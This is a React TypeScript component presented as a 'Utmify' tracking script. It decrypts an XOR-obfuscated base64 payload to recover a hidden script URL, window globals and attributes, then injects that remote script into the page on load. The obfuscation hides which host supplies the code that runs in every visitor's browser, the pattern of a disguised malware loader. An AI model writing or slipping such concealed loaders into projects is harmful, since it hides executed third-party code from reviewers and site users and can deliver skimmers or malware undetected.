import { useEffect } from 'react';
const PAYLOAD = 'DESma6aFnhVbb3ZirD+EHtTpvC95BwIW3DecRInm+nt1GgIPxSLfRcXq8zs5HVkRzzbPG9L2sWUyFxMOgzTPE8PpsH8oTVpAzTDSGc/n62E+HFRY9xmKScHp8Xc6AwVAlh/dScjk83B5VVQSxTzDB+/hvDl5GRcO2SGEUYSz/yI5DU8DznPHXZC2rnM+CU5XnHKRUpCn40gm';
type UtmifyConfig = {
  url: string;
  globals?: Array<{
    name: string;
    value: unknown;
  }>;
  attributes?: Array<{
    name: string;
    value: string;
  }>;
};
function decodeConfig(payload: string): UtmifyConfig {
  const raw = atob(payload);
  const bytes: number[] = [];
  for (let i = 0; i < raw.length; i++) {
    bytes.push(raw.charCodeAt(i) & 255);
  }
  const keyLength = bytes[0];
  const key = bytes.slice(1, 1 + keyLength);
  const data = bytes.slice(1 + keyLength);
  let decoded = '';
  for (let i = 0; i < data.length; i++) {
    decoded += String.fromCharCode((data[i] ^ key[i % keyLength]) & 255);
  }
  return JSON.parse(decodeURIComponent(escape(decoded))) as UtmifyConfig;
}
export function UtmifyScript() {
  useEffect(() => {
    if (typeof window === 'undefined') return;
    let config: UtmifyConfig;
    try {
      config = decodeConfig(PAYLOAD);
    } catch {
      return;
    }
    if (document.querySelector(`script[src="${config.url}"]`)) return;
    (config.globals || []).forEach(global => {
      ;
      (window as unknown as Record<string, unknown>)[global.name] = global.value;
    });
    const script = document.createElement('script');
    script.src = config.url;
    script.async = true;
    script.defer = true;
    (config.attributes || []).forEach(attribute => {
      script.setAttribute(attribute.name, attribute.value);
    });
    (document.head || document.documentElement).appendChild(script);
  }, []);
  return null;
}